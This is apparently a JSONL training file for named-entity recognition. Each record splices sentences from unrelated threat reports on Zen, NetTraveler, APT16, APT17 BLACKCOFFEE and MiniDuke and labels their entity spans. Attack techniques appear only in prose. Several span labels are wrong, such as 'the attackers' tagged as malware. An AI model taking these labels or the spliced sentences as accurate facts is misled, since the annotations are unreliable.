{"text": "This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers , and impacts user experience by consuming their data plan resources . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The Chinese government is therefore concerned whether a DPP victory might weaken the commercial and tourism ties between China and Taiwan , or even drive Taiwan closer to independence . While the full scope of the hack is still under investigation , reports indicate that the actors were primarily trying to steal sensitive information .", "spans": [{"start": 280, "end": 293, "label": "Vulnerability"}, {"start": 309, "end": 327, "label": "System"}, {"start": 334, "end": 352, "label": "Organization"}, {"start": 386, "end": 389, "label": "Organization"}]}
{"text": "The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK . In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In 2005 , the Chinese government passed an \u201c anti-secession \u201d law that signified its intention to use \u201c non-peaceful \u201d means to stymie any Taiwanese attempt to secede from China . While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited , the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users .", "spans": [{"start": 156, "end": 167, "label": "System"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 218, "end": 236, "label": "System"}, {"start": 253, "end": 271, "label": "Organization"}, {"start": 425, "end": 429, "label": "Organization"}, {"start": 433, "end": 442, "label": "Organization"}, {"start": 520, "end": 531, "label": "Organization"}, {"start": 550, "end": 553, "label": "Organization"}]}
{"text": "The command & control server ( C & C server ) returns the URL to click along with a very long list of additional parameters in JSON format . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . APT16 actors sent spear phishing emails to two Taiwanese media organization addresses and three webmail addresses . \u201c Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse , \u201d the report states .", "spans": [{"start": 179, "end": 190, "label": "System"}, {"start": 212, "end": 225, "label": "Vulnerability"}, {"start": 241, "end": 259, "label": "System"}, {"start": 262, "end": 267, "label": "Organization"}, {"start": 295, "end": 301, "label": "System"}, {"start": 380, "end": 389, "label": "System"}]}
{"text": "After rendering the ad on the screen , the app tries to identify the part of the advertisement website to click . Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . The message subject read \u201c DPP \u2019s Contact Information Update \u201d , apparently targeting those interested in contact information for DPP members or politicians . ( CISA , CNN )", "spans": [{"start": 149, "end": 159, "label": "Malware"}, {"start": 165, "end": 183, "label": "Malware"}, {"start": 193, "end": 204, "label": "System"}, {"start": 213, "end": 229, "label": "Malware"}, {"start": 276, "end": 279, "label": "Organization"}, {"start": 379, "end": 382, "label": "Organization"}, {"start": 410, "end": 414, "label": "Organization"}, {"start": 417, "end": 420, "label": "Organization"}]}
{"text": "If that part is found , the app loads Javascript snippets from the JSON parameters to click a button or other HTML element , simulating a real user click . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns . The Chinese government would benefit from improved insight into local media coverage of Taiwanese politics , both to better anticipate the election outcome and to gather additional intelligence on politicians , activists , and others who interact with journalists . Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites , including Google and Meta .", "spans": [{"start": 156, "end": 167, "label": "System"}, {"start": 192, "end": 201, "label": "Organization"}, {"start": 204, "end": 213, "label": "Organization"}, {"start": 218, "end": 241, "label": "Organization"}, {"start": 357, "end": 375, "label": "Organization"}, {"start": 619, "end": 661, "label": "Organization"}, {"start": 682, "end": 691, "label": "Organization"}, {"start": 771, "end": 777, "label": "System"}, {"start": 782, "end": 786, "label": "System"}]}
{"text": "Because a user interacting with an ad often leads to a higher chance of the user purchasing something , ad networks often \" pay per click '' to developers who host their ads . WildFire correctly classifies NetTraveler as malicious . This tactic is not without precedent ; in 2013 , the New York Times revealed it had been the target of China based actors shortly after it reported on the alleged mass accumulation of wealth by then-Prime Minister Wen Jiabao and his family . Several Democratic lawmakers released a report last week that accused TaxAct , H&R Block and TaxSlayer of embedding Meta and Google \u2019s tracking pixels on their sites , potentially violating U.S. law and sharing taxpayers \u2019 information with those companies .", "spans": [{"start": 176, "end": 184, "label": "Organization"}, {"start": 206, "end": 217, "label": "System"}, {"start": 286, "end": 300, "label": "Organization"}, {"start": 483, "end": 503, "label": "Organization"}, {"start": 545, "end": 551, "label": "Organization"}, {"start": 554, "end": 563, "label": "Organization"}, {"start": 568, "end": 577, "label": "System"}, {"start": 591, "end": 595, "label": "Organization"}, {"start": 600, "end": 625, "label": "Organization"}, {"start": 635, "end": 640, "label": "System"}]}
{"text": "Therefore , by simulating fraudulent clicks , these developers are making money without requiring a user to click on an advertisement . The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists . The actors likely sought information on the newspaper \u2019s sources in China , who could be silenced by the government . The report says the data was kept anonymous , but the companies could \u201c easily \u201d use the information to identify individuals or create targeted advertising for them .", "spans": [{"start": 258, "end": 281, "label": "Organization"}, {"start": 284, "end": 293, "label": "Organization"}, {"start": 300, "end": 320, "label": "Organization"}, {"start": 342, "end": 362, "label": "Organization"}, {"start": 367, "end": 376, "label": "Organization"}]}
{"text": "This example code shows a JSON reply returned by the C & C server . Today Kaspersky Lab 's team of experts published a new research report about NetTraveler , which is a family of malicious programs used by APT actors to successfully compromise more than 350 high-profile victims in 40 countries . Compromising these Taiwanese news organizations would also allow the actors to gain access to informants or other protected sources , who might then be targeted for further intelligence collection or even retribution . ( Vox , USA Today )", "spans": [{"start": 74, "end": 87, "label": "Organization"}, {"start": 145, "end": 156, "label": "System"}, {"start": 519, "end": 522, "label": "Organization"}, {"start": 525, "end": 534, "label": "Organization"}]}
{"text": "It has been shortened for brevity . According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 \u2013 2013 . The webmail addresses , while unknown , were possibly the personal-use addresses of the individuals whose corporate domain emails were targeted . Apple had to roll back and then re - release a security update that addressed an actively exploited vulnerability in WebKit .", "spans": [{"start": 49, "end": 62, "label": "Organization"}, {"start": 326, "end": 332, "label": "System"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 439, "end": 462, "label": "Vulnerability"}, {"start": 466, "end": 472, "label": "Organization"}]}
{"text": "Based on this JSON reply , the app looks for an HTML snippet that corresponds to the active element ( show_hide btnnext ) and , if found , the Javascript snippet tries to perform a click ( ) method on it . Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications . As corporate networks become more secure and users become more vigilant , personal accounts can still offer a means to bypass security systems . Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023 - 37450 , a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use .", "spans": [{"start": 310, "end": 327, "label": "Organization"}, {"start": 330, "end": 344, "label": "Organization"}, {"start": 347, "end": 364, "label": "Organization"}, {"start": 367, "end": 380, "label": "Organization"}, {"start": 383, "end": 389, "label": "Organization"}, {"start": 392, "end": 400, "label": "Organization"}, {"start": 405, "end": 419, "label": "Organization"}, {"start": 567, "end": 572, "label": "Organization"}, {"start": 628, "end": 635, "label": "System"}, {"start": 640, "end": 645, "label": "System"}, {"start": 664, "end": 680, "label": "Vulnerability"}, {"start": 724, "end": 742, "label": "System"}, {"start": 755, "end": 761, "label": "System"}, {"start": 772, "end": 784, "label": "System"}]}
{"text": "Rooting trojans The Zen authors have also created a rooting trojan . In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files . This tactic exploits users \u2019 reduced vigilance when reading their own personal email , even when using corporate IT equipment to do so . However , users reported that the fix was causing Safari to not connect correctly to major websites like Facebook , Instagram and Zoom , leading Apple to pull back the patch .", "spans": [{"start": 20, "end": 23, "label": "Malware"}, {"start": 87, "end": 106, "label": "System"}, {"start": 119, "end": 159, "label": "Malware"}, {"start": 206, "end": 248, "label": "Malware"}, {"start": 410, "end": 415, "label": "System"}, {"start": 518, "end": 524, "label": "System"}, {"start": 573, "end": 581, "label": "System"}, {"start": 584, "end": 593, "label": "System"}, {"start": 598, "end": 602, "label": "System"}, {"start": 613, "end": 618, "label": "Organization"}]}
{"text": "Using a publicly available rooting framework , the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of rooted device . During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 . On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website . Since then , Apple released a new fix for iOS , iPadOS and macOS that reliably fixes the vulnerability again .", "spans": [{"start": 182, "end": 195, "label": "Organization"}, {"start": 211, "end": 222, "label": "System"}, {"start": 387, "end": 400, "label": "Organization"}, {"start": 441, "end": 446, "label": "Organization"}, {"start": 519, "end": 539, "label": "Organization"}, {"start": 702, "end": 707, "label": "Organization"}, {"start": 731, "end": 734, "label": "System"}, {"start": 737, "end": 743, "label": "System"}, {"start": 748, "end": 753, "label": "System"}]}
{"text": "Installing apps on the system partition makes it harder for the user to remove the app . Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": [{"start": 89, "end": 102, "label": "Organization"}, {"start": 189, "end": 208, "label": "System"}, {"start": 221, "end": 245, "label": "System"}, {"start": 250, "end": 278, "label": "System"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 474, "end": 488, "label": "Malware"}, {"start": 540, "end": 556, "label": "Vulnerability"}, {"start": 587, "end": 696, "label": "Indicator"}]}
{"text": "This technique only works for unpatched devices running Android 4.3 or lower . Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan . One of the media organizations involved in this latest activity was targeted in June 2015 , while its Hong Kong branch was similarly targeted in August 2015 . ( Forbes , Gizmodo ) \u2022 Vulnerability Roundup : Memory corruption vulnerability in Microsoft Edge ; MilesightVPN and router could be taken over \u2022 Malicious Microsoft Drivers Could Number in the Thousands : Cisco Talos \u2022 New Threat Actor Launches Cyber - attacks on Ukraine and Poland \u2022", "spans": [{"start": 56, "end": 67, "label": "System"}, {"start": 88, "end": 101, "label": "Organization"}, {"start": 650, "end": 656, "label": "Organization"}, {"start": 659, "end": 666, "label": "Organization"}, {"start": 695, "end": 726, "label": "Vulnerability"}, {"start": 730, "end": 744, "label": "System"}, {"start": 747, "end": 759, "label": "System"}, {"start": 793, "end": 820, "label": "System"}, {"start": 853, "end": 864, "label": "Organization"}, {"start": 893, "end": 908, "label": "Organization"}]}
{"text": "Devices running Android 4.4 and higher are protected by Verified Boot . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . APT16 actors were likely also responsible for the June 2015 activity . Uncovering weaknesses in Apple macOS and VMWare vCenter : 12 vulnerabilities in RPC implementation \u2022", "spans": [{"start": 16, "end": 27, "label": "System"}, {"start": 72, "end": 85, "label": "Organization"}, {"start": 109, "end": 134, "label": "Vulnerability"}, {"start": 182, "end": 209, "label": "Malware"}, {"start": 212, "end": 239, "label": "Malware"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 338, "end": 349, "label": "System"}, {"start": 354, "end": 368, "label": "System"}]}
{"text": "Zen 's rooting trojan apps target a specific device model with a very specific system image . In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper . They sent spear phishing messages with the subject \u201c 2015 Taiwan Security and Cultural Forum Invitation Form \u201d , and used a different tool \u2013 a tool that we refer to as DOORJAMB \u2013 in their attempt to compromise the organization . Talos Takes Ep .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 180, "end": 188, "label": "Organization"}, {"start": 382, "end": 390, "label": "Malware"}, {"start": 443, "end": 448, "label": "Organization"}]}
{"text": "After achieving root access the app tries to replace the framework.jar file on the system partition . Historically , Nitro is known for targeted spear phishing campaigns and using Poison Ivy malware , which was not seen in these attacks . A different group , known as admin@338 , used LOWBALL malware during its Hong Kong activity . # 147 : The dangers of \" Mercenary \" groups and the spyware they create Upcoming events where you can find Talos \u201c Most prevalent malware files \u201d is taking a break this week for maintenance .", "spans": [{"start": 57, "end": 70, "label": "Indicator"}, {"start": 180, "end": 198, "label": "System"}, {"start": 268, "end": 277, "label": "Indicator"}, {"start": 285, "end": 292, "label": "Malware"}, {"start": 358, "end": 376, "label": "Organization"}, {"start": 440, "end": 445, "label": "Organization"}]}
{"text": "Replicating framework.jar allows the app to intercept and modify the behavior of the Android standard API . Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT . Despite the differing sponsorship , penetration of Hong Kong and Taiwan based media organizations continues to be a priority for China based threat groups . On December 17th , the Ukrainian capital Kiev was hit by a blackout .", "spans": [{"start": 12, "end": 25, "label": "Indicator"}, {"start": 85, "end": 92, "label": "System"}, {"start": 216, "end": 224, "label": "System"}, {"start": 229, "end": 260, "label": "System"}, {"start": 278, "end": 300, "label": "Organization"}, {"start": 519, "end": 527, "label": "Malware"}]}
{"text": "In particular , these apps try to add an additional method called statistics ( ) into the Activity class . In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" . The difference in sponsorship could be the result of tasking systems that allocate targeting responsibility to different groups based on their targets \u2019 geographic location . Local investigators later confirmed that the energy outage was caused by a cyberattack .", "spans": [{"start": 242, "end": 250, "label": "System"}, {"start": 430, "end": 449, "label": "Organization"}, {"start": 505, "end": 516, "label": "Organization"}]}
{"text": "When inserted , this method runs every time any Activity object in any Android app is created . Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) . In other words , while media organizations are important targets , it is possible that two separate groups are responsible for Hong Kong and Taiwan , respectively . Shortly thereafter , ESET \u00ae researchers analyzed a sophisticated new malware , which is the main suspect in this case .", "spans": [{"start": 459, "end": 477, "label": "Organization"}, {"start": 503, "end": 514, "label": "Malware"}]}
{"text": "This happens all the time in regular Android apps , as Activity is one of the fundamental Android UI elements . The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample . The suspected APT16 targeting of the Taiwanese government agency \u2013 in addition to the Taiwanese media organizations \u2013 further supports this possibility . They have named it Industroyer \u2013 the biggest threat to Industrial Control Systems ( ICS ) since Stuxnet .", "spans": [{"start": 37, "end": 44, "label": "System"}, {"start": 90, "end": 97, "label": "System"}, {"start": 140, "end": 148, "label": "System"}, {"start": 206, "end": 221, "label": "System"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 261, "end": 281, "label": "Organization"}, {"start": 397, "end": 408, "label": "Malware"}, {"start": 433, "end": 465, "label": "System"}]}
{"text": "The only purpose of this method is to connect to the C & C server . As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection . IRONHALO : CVE-2015-1701 . This dangerous malware was developed to exploit weaknesses in those systems and the communication protocols they use \u2013 systems developed decades ago with almost no security measures .", "spans": [{"start": 225, "end": 233, "label": "Malware"}, {"start": 236, "end": 249, "label": "Vulnerability"}]}
{"text": "The Zen trojan After achieving persistence , the trojan downloads additional payloads , including another trojan called Zen . Attacks on the chemical industry are merely their latest attack wave . ELMER : CVE-2015-1701 . Adversaries may manipulate physical process control within the industrial environment .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 120, "end": 123, "label": "Malware"}, {"start": 141, "end": 158, "label": "Organization"}, {"start": 197, "end": 202, "label": "Malware"}, {"start": 205, "end": 218, "label": "Vulnerability"}, {"start": 221, "end": 232, "label": "Organization"}]}
{"text": "Zen requires root to work correctly on the Android operating system . The goal of the attackers appears to be to collect intellectual property such as design documents , formulas , and manufacturing processes . These clusters of activity raise interesting questions about the use of an identical silently-patched vulnerability , possibly by multiple threat groups . Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 43, "end": 50, "label": "System"}]}
{"text": "The Zen trojan uses its root privileges to turn on accessibility service ( a service used to allow Android users with disabilities to use their devices ) for itself by writing to a system-wide setting value enabled_accessibility_services . The attack wave started in late July 2011 and continued into midSeptember 2011 . Both Japan and Taiwan are important intelligence collection targets for China , particularly because of recent changes to Japan \u2019s pacifist constitution and the upcoming Taiwanese election . Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 99, "end": 106, "label": "System"}, {"start": 512, "end": 523, "label": "Organization"}]}
{"text": "Zen does n't even check for the root privilege : it just assumes it has it . The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage . Based on our visibility and available data , we only attribute one campaign to the Chinese APT group APT16 . The duration of manipulation may be temporary or longer sustained , depending on operator detection .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 303, "end": 308, "label": "Organization"}]}
{"text": "This leads us to believe that Zen is just part of a larger infection chain . They then moved on to the motor industry in late May . APT17 . A Polish student used a remote controller device to interface with the Lodz city tram system in Poland .", "spans": [{"start": 30, "end": 33, "label": "Malware"}, {"start": 103, "end": 117, "label": "Organization"}, {"start": 132, "end": 137, "label": "Organization"}, {"start": 142, "end": 156, "label": "Organization"}, {"start": 162, "end": 188, "label": "System"}, {"start": 207, "end": 232, "label": "System"}]}
{"text": "The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services , chosen by checking the operating system version , to create new Google accounts . From late April to early May , the attackers focused on human rights related NGOs . FireEye Threat Intelligence and the Microsoft Threat Intelligence Center investigated a command-and-control ( C2 ) obfuscation tactic used on Microsoft \u2019s TechNet , a web portal for IT professionals . Using this remote , the student was able to capture and replay legitimate tram signals .", "spans": [{"start": 73, "end": 84, "label": "System"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 298, "end": 305, "label": "Organization"}, {"start": 334, "end": 343, "label": "Organization"}, {"start": 386, "end": 405, "label": "System"}, {"start": 408, "end": 410, "label": "System"}, {"start": 440, "end": 449, "label": "Organization"}, {"start": 453, "end": 460, "label": "System"}]}
{"text": "This is done by opening the Google account creation process and parsing the current view . Attackers then moved on to the motor industry in late May . TechNet \u2019s security was in no way compromised by this tactic , which is likely possible on other message boards and forums . As a consequence , four trams were derailed and twelve people injured due to resulting emergency stops .", "spans": [{"start": 28, "end": 34, "label": "Organization"}, {"start": 122, "end": 136, "label": "Organization"}, {"start": 151, "end": 158, "label": "System"}]}
{"text": "The app then clicks the appropriate buttons , scrollbars , and other UI elements to go through account sign-up without user intervention . At this point , the current attack campaign against the chemical industry began . FireEye Threat Intelligence assesses that APT17 , a China based threat group , was behind the attempt . The track controlling commands issued may have also resulted in tram collisions , a further risk to those on board and nearby the areas of impact .", "spans": [{"start": 195, "end": 212, "label": "Organization"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}]}
{"text": "During the account sign-up process , Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA . The attackers first researched desired targets and then sent an email specifically to the target . Other groups have used legitimate websites to host C2 IP address in the past . On Feb 12th 2013 , FireEye announced the discovery of an Adobe Reader 0 - day exploit which is used to drop a previously unknown , advanced piece of malware .", "spans": [{"start": 37, "end": 43, "label": "Organization"}, {"start": 286, "end": 288, "label": "System"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 371, "end": 399, "label": "Vulnerability"}]}
{"text": "To get around this , the app then uses its root privilege to inject code into the Setup Wizard , extract the CAPTCHA image , and sends it to a remote server to try to solve the CAPTCHA . First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners . APT17 was embedding the encoded C2 IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \u201c dead drop resolver. \u201d Encoding the IP address makes it more difficult to identify the true C2 address for network security professionals . We called this new malware ?", "spans": [{"start": 325, "end": 330, "label": "Organization"}, {"start": 357, "end": 359, "label": "System"}, {"start": 379, "end": 390, "label": "Malware"}, {"start": 413, "end": 422, "label": "Organization"}, {"start": 423, "end": 430, "label": "System"}, {"start": 618, "end": 620, "label": "System"}, {"start": 685, "end": 692, "label": "Malware"}]}
{"text": "It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background . While the attackers used different pretexts when sending these malicious emails , two methodologies stood out . Few security companies have publicly discussed this tactic . ItaDuke because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri - s ? Divine Comedy .", "spans": [{"start": 321, "end": 328, "label": "Malware"}, {"start": 355, "end": 359, "label": "Malware"}, {"start": 433, "end": 448, "label": "Organization"}, {"start": 455, "end": 468, "label": "Organization"}]}
{"text": "After the server returns the solution , the app enters it into the appropriate text field to complete the CAPTCHA challenge . Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update . After discovering the BLACKCOFFEE activity , the FireEye-Microsoft team encoded a sinkhole IP address into the profile pages and forum threads and locked the accounts to prevent the threat actors from making any changes . Since the original announcement , we have observed several new attacks using the same exploit ( CVE-2013 - 0640 ) which drop other malware .", "spans": [{"start": 278, "end": 289, "label": "Malware"}, {"start": 305, "end": 322, "label": "Organization"}, {"start": 515, "end": 571, "label": "Indicator"}, {"start": 574, "end": 589, "label": "Vulnerability"}]}
{"text": "The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding . The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States . This collaborative approach allowed the team to observe the malware and its victims . Together with our partner CrySyS Lab , we - ve performed a detailed analysis of these unusual incidents which suggest a new , previously unknown threat actor .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 206, "end": 209, "label": "System"}, {"start": 355, "end": 365, "label": "Organization"}, {"start": 466, "end": 486, "label": "Organization"}]}
{"text": "It 's one of the strings - \" How you 'll sign in '' - that it looks for during the account creation process . Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu . Though the security community has not yet broadly discussed this technique , FireEye has observed other threat groups adopting these measures and expect this trend to continue on other community sites . For the CrySyS Lab analysis , please read [ here ] .", "spans": [{"start": 142, "end": 145, "label": "System"}, {"start": 150, "end": 159, "label": "System"}, {"start": 201, "end": 214, "label": "System"}, {"start": 294, "end": 301, "label": "Organization"}, {"start": 428, "end": 438, "label": "Organization"}]}
{"text": "The code snippet below shows part of the screen parsing process . This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users . Today , FireEye released Indicators of Compromise ( IOCs ) for BLACKCOFFEE and Microsoft released signatures for its anti-malware products . The MiniDuke attackers are still active at this time and have created malware as recently as February 20 , 2013 .", "spans": [{"start": 204, "end": 211, "label": "Organization"}, {"start": 259, "end": 270, "label": "Malware"}, {"start": 275, "end": 284, "label": "Organization"}, {"start": 341, "end": 359, "label": "Organization"}]}
{"text": "Apart from injecting code to read the CAPTCHA , the app also injects its own code into the system_server process , which requires root privileges . The Sogu gang use a custom developed threat \u2013 Backdoor.Sogu , whereas the group described in this document use an off the shelf threat \u2013 Poison Ivy . APT17 , also known as DeputyDog , is a Chinabased threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations . To compromise the victims , the attackers used extremely effective social engineering techniques which involved sending malicious PDF documents to their targets .", "spans": [{"start": 194, "end": 207, "label": "System"}, {"start": 285, "end": 295, "label": "System"}, {"start": 298, "end": 303, "label": "Organization"}, {"start": 320, "end": 329, "label": "Organization"}, {"start": 366, "end": 373, "label": "Organization"}, {"start": 636, "end": 685, "label": "Organization"}]}
{"text": "This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process . The Sogu gang , in contrast , use PDF and DOC files in very tailored , targeted emails . BLACKCOFFEE \u2019s functionality includes uploading and downloading files ; creating a reverse shell ; enumerating files and processes ; renaming , moving , and deleting files ; terminating processes ; and expanding its functionality by adding new backdoor commands . The PDFs were highly relevant and well - crafted content that fabricated human rights seminar information ( ASEM ) and Ukraine - s foreign policy and NATO membership plans .", "spans": [{"start": 230, "end": 233, "label": "System"}, {"start": 238, "end": 247, "label": "System"}, {"start": 285, "end": 296, "label": "Malware"}]}
{"text": "The app also creates hooks to prevent the phone from rebooting , going to sleep or allowing the user from pressing hardware buttons during the account creation process . These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations . FireEye has monitored APT17 \u2019s use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the C2 communication as queries to web search engines . These malicious PDF files were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": [{"start": 208, "end": 224, "label": "Organization"}, {"start": 292, "end": 313, "label": "Organization"}, {"start": 320, "end": 346, "label": "Organization"}, {"start": 395, "end": 404, "label": "Organization"}, {"start": 416, "end": 442, "label": "Organization"}, {"start": 445, "end": 452, "label": "Organization"}, {"start": 467, "end": 472, "label": "Organization"}, {"start": 483, "end": 494, "label": "Malware"}, {"start": 593, "end": 595, "label": "System"}, {"start": 651, "end": 670, "label": "Malware"}, {"start": 707, "end": 742, "label": "System"}]}
{"text": "These hooks are created using the root access and a custom native code called Lmt_INJECT , although the algorithm for this is well known . Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . The use of BLACKCOFFEE demonstrates threat actors \u2019 evolving use of public websites to hide in plain sight . Once the system is exploited , a very small downloader is dropped onto the victim - s disc that - s only 20 KB in size .", "spans": [{"start": 139, "end": 144, "label": "Organization"}, {"start": 172, "end": 187, "label": "Organization"}, {"start": 317, "end": 328, "label": "Malware"}]}
{"text": "First , the app has to turn off SELinux protection . This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . In the past , threat actors would modify easily compromised websites to host C2 commands and configuration , as observed in the China based APT1 \u2019s WEBC2 suite of backdoors . This downloader is unique per system and contains a customized backdoor written in Assembler .", "spans": [{"start": 32, "end": 39, "label": "System"}, {"start": 89, "end": 104, "label": "Organization"}, {"start": 300, "end": 302, "label": "System"}, {"start": 363, "end": 367, "label": "Organization"}, {"start": 371, "end": 376, "label": "Malware"}, {"start": 398, "end": 490, "label": "Malware"}]}
{"text": "Then the app finds a process id value for the process it wants to inject with code . These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions . Now , threat actors are using well-known websites\u2014that they do not need to compromise to host C2 IP addresses . When loaded at system boot , the downloader uses a set of mathematical calculations to determine the computer - s unique fingerprint , and in turn uses this data to uniquely encrypt its communications later .", "spans": [{"start": 295, "end": 297, "label": "System"}]}
{"text": "This is done using a series of syscalls as outlined below . The attackers try to lure targets through spear phishing emails that include compressed executables . They simply use the website for legitimate purposes , such as posting forum threads or creating profile pages . If the target system meets the pre - defined requirements , the malware will use Twitter ( unbeknownst to the user ) and start looking for specific tweets from pre - made accounts .", "spans": []}
{"text": "The \" source process '' refers to the Zen trojan running as root , while the \" target process '' refers to the process to which the code is injected and [ pid ] refers to the target process pid value . We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries . APT17 went further to obfuscate their C2 IP address and employed a multi-layered approach for the malware to finally beacon the true C2 IP . These accounts were created by MiniDuke - s Command and Control ( C2 ) operators and the tweets maintain specific tags labeling encrypted URLs for the backdoors .", "spans": [{"start": 38, "end": 41, "label": "Malware"}, {"start": 263, "end": 273, "label": "Organization"}, {"start": 276, "end": 287, "label": "Organization"}, {"start": 292, "end": 319, "label": "Organization"}, {"start": 348, "end": 353, "label": "Organization"}, {"start": 386, "end": 388, "label": "System"}, {"start": 481, "end": 483, "label": "System"}]}
{"text": "The source process checks the mapping between a process id and a process name . Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 . They used legitimate infrastructure\u2014the ability to post or create comments on forums and profile pages\u2014to embed a string that the malware would decode to find and communicate with the true C2 IP address . These URLs provide access to the C2s , which then provide potential commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": [{"start": 90, "end": 116, "label": "Organization"}, {"start": 119, "end": 122, "label": "Organization"}, {"start": 421, "end": 423, "label": "System"}]}
